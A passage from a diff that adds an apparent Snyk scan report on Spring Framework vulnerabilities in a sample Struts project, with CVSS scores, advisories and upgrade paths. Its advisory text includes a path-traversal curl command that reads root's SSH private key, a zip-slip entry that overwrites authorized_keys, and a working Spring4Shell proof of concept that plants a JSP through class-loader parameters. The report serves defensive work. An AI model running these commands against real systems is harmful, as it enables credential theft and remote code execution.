"2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. 
\n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + 
"functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE", + "org.springframework:spring-core@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": 
"https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not 
Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + 
"title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": 
"0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": 
"org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- 
[Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + 
"[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. 
\r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara 
Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", 
+ "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS 